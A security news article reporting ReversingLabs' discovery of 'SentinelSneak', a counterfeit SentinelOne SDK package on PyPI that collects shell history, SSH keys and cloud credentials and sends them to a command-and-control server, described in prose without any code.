Security researchers at ReversingLabs have discovered a malicious Python package on the PyPI (the Python Package Index) repository that poses as a legitimate SDK client from cybersecurity firm SentinelOne, but contains a malicious backdoor and data exfiltration functionality.
According to ReversingLabs, which calls this campaign “SentinelSneak,” the imposter package was first uploaded to PyPI on December 11, 2022, and has been updated 20 times since, with the most recent version (1.2.1) uploaded on December 13.
While the module appears to be a fully functional SentinelOne client, it is has no connection to the legitimate threat detection company. Apparently, the package developer tried to capitalize on recognized brand image to trick unsuspecting users.
While examining the SentinelOne PyPI package, the researchers noticed that the project page has a very rudimentary look with no description of the SentinelOne package and a maintainer account that was created only days before the initial package was uploaded, which they found to be suspicious.
“Especially interesting was the combination of the detected behaviors which includes enumeration of files in a given directory, deleting of a file/directory and creation of a new process. When such behaviors are combined with the presence of a URL which references the host by IP address, you can mark that module as suspicious. Referencing the host by an official domain would be expected from a commercial product,” ReversingLabs explained.
Digging further, the researchers discovered a malicious code in “api.py” files designed to collect data about shell command execution history as well as the contents of the .ssh folder containing ssh keys and configuration information, including access credentials and secrets, related to git, kubernetes and AWS services.
“The code likewise performs a directory listing of the root directory. The collected data is then exfiltrated to the command and control (C2) server. Though clearly malicious, the counterfeit SentinelOne package is selective: taking only what is needed, and focusing on the subset of services that are found on machines used for software development,” the researchers noted.
ReversingLabs said it informed the PyPI security team about the malicious package on December 15, 2022, and SentinelOne was notified on December 16, 2022.
